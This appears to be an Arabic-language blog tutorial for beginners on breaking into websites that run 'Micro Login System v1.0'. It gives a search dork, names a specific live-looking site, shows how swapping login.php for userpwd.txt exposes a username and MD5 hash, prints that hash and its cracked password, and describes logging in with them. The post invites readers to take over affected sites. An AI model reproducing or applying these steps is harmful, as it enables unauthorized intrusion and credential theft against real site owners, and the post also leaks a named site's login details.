شرح ثغرة Micro Login System للإختراق المواقع المصابة بها
اليوم قررت ان افيدكم بثغرة قديـمة ولاكن فعالة
ادهب الىوتكتب الدورك
Micro Login System v 1.0
ومن هنا تعريف للدورك وماذا يقصد به
ستجد مواقع كثيرة
انا على سبيل المثال وجدت
http://www.rjonesprintanddisplay.com/ftp/login.php
rjonesprintanddisplay.com : نغيره بإسم الموقع المستهدف
ندخل عليه نجده يطلب يوزر ولوحة التحكم
طيب الان نحذف login.php
ونعوضها بـ userpwd.txt
http://www.rjonesprintanddisplay.com/ftp/userpwd.txt
تمام الان طلع لنا اليوزر و الباس على شكل هاش
user:alex
password:83e1ea39c9d3b1999c0bfe5b8bf1fd9a
طيب بقى لنا الان نفك الهاش سهلة
نفك الهاش من الموقع التالي
:
user : alexpassword : hellooo
الان نرجع الى
http://www.rjonesprintanddisplay.com/ftp/login.php
ونحط في اليوزر : alexوفي الباسورد : hellooo
هده تغرة للمبتدئين فقط و مبروك عليك المواقع و انتظروا الجديد ان شاء الله,وتذكرو دائما فهذه الثغرة ليست فعالة دائما.وليست مع كل المواقع سوى المواقع المصابة بهذه الثغرة فقط.
شرح ثغرة Micro Login System للإختراق المواقع المصابة بها
مراجعة Unknown
يوم
2:42 AM
التقييم:
مراجعة Unknown
يوم
2:42 AM
التقييم:
